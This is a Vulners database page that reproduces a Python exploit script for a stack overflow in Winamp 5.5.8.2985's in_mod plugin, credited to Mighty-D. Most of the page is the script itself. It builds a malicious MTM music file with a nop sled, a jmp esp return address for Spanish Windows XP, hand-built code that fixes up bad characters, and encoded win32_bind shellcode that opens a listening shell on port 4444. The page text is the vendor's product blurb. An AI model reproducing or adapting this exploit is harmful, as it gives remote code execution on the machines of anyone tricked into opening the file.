Vulners
Lucene search
Winamp 5.5.8.2985 Stack Overflow
`#!/usr/bin/python
# Pwn And Beans by Mighty-D presents:
# Winamp 5.5.8.2985 (in_mod plugin) Stack Overflow
# WINDOWS XP SP3 FULLY PATCHED - NO ASLR OR DEP BYPASS... yet
# Bug found by http://www.exploit-db.com/exploits/15248/
# POC by fdisk
# Exploit by Mighty-D
# Special thanks to:
# fdisk: Who wrote the skeleton of what you are looking at
# Ryujin: For pointing the bug
# Muts: For bringing the pain and the omelet ideas that weren't used
# dijital1 and All the EDB-Team
# The guys from UdeA, Ryepes, HerreraDavid, GomezRam7
# Just one comment: Stupid badchars!!!!!!!
header = "\x4D\x54\x4D\x10\x53\x70\x61\x63\x65\x54\x72\x61\x63\x6B\x28\x6B\x6F\x73\x6D\x6F\x73\x69\x73\x29\xE0\x00\x29\x39\x20\xFF\x1F\x00\x40\x0E"
header += "\x04\x0C" * 16
nopsled = "\x90" * 58207
eip = "\xED\x1E\x95\x7C" # jmp esp WIN XP SPANISH change at will
patch_shellcode = "\x90" * 16
patch_shellcode += "\x90\x33\xDB" # Set EBX to zero
patch_shellcode += "\x54\x5B" # PUSH ESP ; POP EBX GET THE RELATIVE POSITION
patch_shellcode += "\x81\xEB\x95\xFC\xFF\xFF" # make EBX point to our shell
patch_shellcode += "\x43"*13 # Move EBX as close as we can to the first badchar
patch_shellcode += "\x90"*4 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*1 # Move EBX to the first badchar
patch_shellcode += "\x80\x2B\x20" # Set it to 13 - verified
patch_shellcode += "\x43"*3 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # Set it to 05 - verified
patch_shellcode += "\x43"*16 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\xEC" # Set it to 21 - verified
patch_shellcode += "\x43"*1 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x7C" # Set it to 8e - verified
patch_shellcode += "\x90"*8 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*30 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # Set it to 05 - verified
patch_shellcode += "\x90"*8 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*11 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x42" # Set it to CB - verified
patch_shellcode += "\x43"*1 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x78" # Set it to 92 - verified
patch_shellcode += "\x90"*26 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*18 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # Set it to 04 - verified
patch_shellcode += "\x90"*16 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*15 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # Set it to 02 - verified
patch_shellcode += "\x43"*8 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x21" # Set it to EC - verified
patch_shellcode += "\x43"*1 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x7C" # Set it to 8e - verified
patch_shellcode += "\x90"*14 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*18 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x49" # Set it to c1 - verified
patch_shellcode += "\x90"*13 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*4 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # Set it to EA, but we need F6
patch_shellcode += "\x80\x2B\xF4" # Set it to F6 - verified
patch_shellcode += "\x43"*9 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # Set it to 11 - verified
patch_shellcode += "\x43"*10 # Move EBX to the next badchar
patch_shellcode += "\x90"*3 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x80\x2B\xCD" # Set it to 3D - verified
patch_shellcode += "\x43"*3 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # Set it to 07 - verified
patch_shellcode += "\x43"*11 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # Set it to 12 - verified
patch_shellcode += "\x43"*4 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # Set it to 12 - verified
patch_shellcode += "\x90"*13 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*4 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # Set it to 12 - verified
patch_shellcode += "\x43"*8 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # Set it to 12 - verified
patch_shellcode += "\x90"*19 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*11 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x8E" # Set it to 7F - verified
patch_shellcode += "\x43"*1 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\xDF" # Set it to 2B - verified
patch_shellcode += "\x43"*8 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x1E" # Set it to EC - verified
patch_shellcode += "\x90"*11 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*12 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # Set it to 8 - verified
patch_shellcode += "\x90"*28 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*29 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\xa7" # Set it to 66 - verified
patch_shellcode += "\x43"*1 # Move EBX to the next badchar
patch_shellcode += "\x90"*4 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x80\x2B\xb8" # Set it to 52 - verified
patch_shellcode += "\x90"*9 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*17 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # Set it to 3 - verified
patch_shellcode += "\x90"*9 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*3 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # Set it to 12 - verified
patch_shellcode += "\x90"*12 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*2 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # Set it to 3 - verified
patch_shellcode += "\x43"*7 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # Set it to 2 - verified
patch_shellcode += "\x90"*10 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*6 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # Set it to 13 - verified
patch_shellcode += "\x43"*3 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # Set it to 5 - verified
patch_shellcode += "\x43"*3 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x1B" # Set it to F2 - verified
patch_shellcode += "\x43"*1 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\xF4" # Set it to 16 - verified
patch_shellcode += "\x90"*19 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*4 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # Set it to 10 - verified
patch_shellcode += "\x43"*4 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # Set it to 10 - verified
patch_shellcode += "\x90"*20 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*17 # Move EBX to the next badchar
patch_shellcode += "\x90"*28 # Lazy nopsled
patch_shellcode += "\x43"*16 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x26" # Set it to E7 - verified
patch_shellcode += "\x90"*18 # Nop sled to avoid damage from CrLf
patch_shellcode += "\x43"*1 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\xBE" # Set it to 4C - verified
patch_shellcode += "\x43"*7 # Move EBX to the next badchar
patch_shellcode += "\x80\x2B\x20" # Set it to 5 - verified
patch_shellcode += "\x90"*(66)
# win32_bind - EXITFUNC=process LPORT=4444 Size=344 Encoder=PexFnstenvSub
shellcode = "\x29\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73"
shellcode += "\x33" # Should be 13
shellcode += "\xa9\x41"
shellcode += "\x25" # should be 05
shellcode += "\x3f\x83\xeb\xfc\xe2\xf4\x55\x2b\xee\x72\x41\xb8\xfa\xc0"
shellcode += "\x56" # \x21\x8e Ripped
shellcode += "\x53\x8d\x65\x8e\x7a\x95\xca\x79\x3a\xd1\x40\xea\xb4"
shellcode += "\xe6\x59\x8e\x60\x89\x40\xee\x76\x22\x75\x8e\x3e\x47\x70\xc5\xa6"
shellcode += "\x25" # should be 05
shellcode += "\xc5\xc5\x4b\xae\x80\xcf\x32\xa8\x83\xee" # \xcb\x92
shellcode += "\x15\x21\x17"
shellcode += "\xdc\xa4\x8e\x60\x8d\x40\xee\x59\x22\x4d\x4e\xb4\xf6\x5d"
shellcode += "\x24" #Should be 04
shellcode += "\xd4\xaa\x6d\x8e\xb6\xc5\x65\x19\x5e\x6a\x70\xde\x5b\x22"
shellcode += "\x22" # Should be 02
shellcode += "\x35\xb4\xe9\x4d\x8e\x4f\xb5" # \xec\8e Ripped
shellcode += "\x7f\xa1\x1f\x6d\xb1\xe7\x4f\xe9\x6f"
shellcode += "\x56\x97\x63\x6c\xcf\x29\x36\x0d" # \xc1 Ripped
shellcode += "\x36\x76\x0d" # \xf6 ripped
shellcode += "\x15\xfa\xef"
shellcode += "\xc1\x8a\xe8\xc3\x92"
shellcode += "\x31" # Should be 11
shellcode += "\xfa\xe9\xf6\xc8\xe0\x59\x28\xac\x0d" # \x3d ripped
shellcode += "\xfc\x2b"
shellcode += "\x27" # should be 07
shellcode += "\xc0\x79\x29\xdc\x36\x5c\xec\x52\xc0\x7f"
shellcode += "\x32" # should be 12
shellcode += "\x56\x6c\xfa"
shellcode += "\x32" # should be 12
shellcode += "\x46\x6c\xea"
shellcode += "\x32" # should be 12
shellcode += "\xfa\xef\xcf\x29\x14\x63\xcf"
shellcode += "\x32" #should be 12
shellcode += "\x8c\xde"
shellcode += "\x3c\x29\xa1\x25\xd9\x86\x52\xC0" # \x7f\x2b Ripped
shellcode += "\x15\x6e\xfc\xbe\xd5\x57"
shellcode += "\x0d" # \xec Ripped
shellcode += "\x2b\xd6\xfe\xbe\xd3\x6c\xfc\xbe\xd5\x57\x4c"
shellcode += "\x28" # should be 08
shellcode += "\x83\x76"
shellcode += "\xfe\xbe\xd3\x6f\xfd\x15\x50\xc0\x79\xd2\x6d\xd8\xd0\x87\x7c\x68"
shellcode += "\x56\x97\x50\xc0\x79\x27\x6f\x5b\xcf\x29" # \x66\x52 Ripped
shellcode += "\x20\xa4\x6f\x6f"
shellcode += "\xf0\x68\xc9\xb6\x4e\x2b\x41\xb6\x4b\x70\xc5\xcc"
shellcode += "\x23" # shoudl be 03
shellcode += "\xbf\x47"
shellcode += "\x32" #Should be 12
shellcode += "\x57"
shellcode += "\x23" # Should be 03
shellcode += "\x29\xac\x24\x3b\x3d\x94"
shellcode += "\x22" # should be 02
shellcode += "\xea\x6d\x4d\x57\xf2"
shellcode += "\x33" # should be 13
shellcode += "\xc0\xdc"
shellcode += "\x25" # should be 5
shellcode += "\xfa\xe9" # \xf2\x16 Ripped
shellcode += "\x57\x6e\xf8"
shellcode += "\x30" #should be 10
shellcode += "\x6f\x3e\xf8"
shellcode += "\x30" # Should be 10
shellcode += "\x50\x6e"
shellcode += "\x56\x91\x6d\x92\x70\x44\xcb\x6c\x56\x97\x6f\xc0\x56\x76\xfa\xef"
shellcode += "\x22\x16\xf9\xbc\x6d\x25\xfa\xe9\xfb\xbe\xd5"
shellcode += "\x57\xd7\x99" #\xe7\x4c Ripped
shellcode += "\xfa\xbe\xd3\xc0\x79\x41"
shellcode += "\x25" # should be 05
shellcode += "\x3f"
payload = header + nopsled + eip + patch_shellcode + shellcode
try:
file = open("crash.mtm", "w")
file.write(payload)
file.close()
print "MTM file generated successfuly"
except:
print "Cannot create file"
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
20 Oct 2010 00:00Current
0.7Low risk
Vulners AI Score0.7